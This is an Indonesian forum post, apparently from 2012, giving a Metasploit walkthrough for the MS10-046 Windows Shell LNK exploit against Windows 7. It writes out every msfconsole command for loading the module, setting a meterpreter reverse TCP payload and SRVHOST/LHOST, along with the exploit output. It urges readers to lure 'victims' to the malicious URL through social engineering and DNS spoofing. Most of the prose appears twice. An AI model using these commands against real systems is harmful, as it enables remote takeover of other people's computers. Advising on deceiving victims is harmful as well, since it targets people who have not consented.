10-07-2012, 10:17 PM
exploit ini masih work di windows7 .. walaupun memang dibutuhkan tehnik2 social engineering untuk membawa target membuka malicious url yang sudah anda siapkan sebelumnya … oke untuk tutorial kali ini kembali lagi ane menggunakan dracos2 x64 .. mungkin yang mau nyoba-nyoba dracos bisa kesini
http://dracos-linux.org
Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok )
Setelah terbuka seperti ini
lanjutkan dengan menggunakan fasilitas search
Tuh sudah kelihatan exploit yang kita cari .. gunakan exploit tersebut
Terus biar kita jadi mode listener kita gunakan payload windows meterpreter reverse TCP
Cek opsi2 yang kita perlu dalam menjalankan exploit ini
Ok kita butuh alamat server ( srvhost ) dimana nantinya metasploit akan memulai malicious url dengan port 80 ( default ) dan path / uripath ( / )
Kebetulan sih ip yang ane pake pada percobaan ini adalah
Terus sebagai persyaratan payload reverse TCP kita wajib memberikan informasi local host kita ( LHOST )
Jalankan exploit dengan perintah exploit .. gk usah di tambahkan -j untuk opsi background process karena exploit ini sudah dengan sendirinya berjalan di sana
hmm ketika target membuka url malicious kita maka dengan sendiri nya server malicious akan mengirimkan backdoor .. dan meterpreter pun terbuka untuk attacker
Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda ..
akhir kata saya ucapkan selamat makan
http://dracos-linux.org
Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok )
Code:
root@dracos:~# msfconsole
Setelah terbuka seperti ini
lanjutkan dengan menggunakan fasilitas search
Code:
msf > search LNK
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent Microsoft Windows Shell LNK Code Execution
post/windows/escalate/droplnk normal Windows Escalate SMB Icon LNK Dropper
post/windows/gather/dumplinks normal Windows Gather Dump Recent Files lnk Info
Tuh sudah kelihatan exploit yang kita cari .. gunakan exploit tersebut
Code:
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Terus biar kita jadi mode listener kita gunakan payload windows meterpreter reverse TCP
Code:
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
Cek opsi2 yang kita perlu dalam menjalankan exploit ini
Code:
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Ok kita butuh alamat server ( srvhost ) dimana nantinya metasploit akan memulai malicious url dengan port 80 ( default ) dan path / uripath ( / )
Code:
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.2.7
SRVHOST => 192.168.2.7
Kebetulan sih ip yang ane pake pada percobaan ini adalah
Code:
root@dracos:~# ifconfig wlan0 |grep inet
inet addr:192.168.2.7 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link
Terus sebagai persyaratan payload reverse TCP kita wajib memberikan informasi local host kita ( LHOST )
Code:
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.2.7
LHOST => 192.168.2.7
Jalankan exploit dengan perintah exploit .. gk usah di tambahkan -j untuk opsi background process karena exploit ini sudah dengan sendirinya berjalan di sana
Code:
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /bnVuSf
[*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Sending 301 for /bnVuSf ...
[*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND
sniff..
hmm ketika target membuka url malicious kita maka dengan sendiri nya server malicious akan mengirimkan backdoor .. dan meterpreter pun terbuka untuk attacker
Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda ..
akhir kata saya ucapkan selamat makan
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only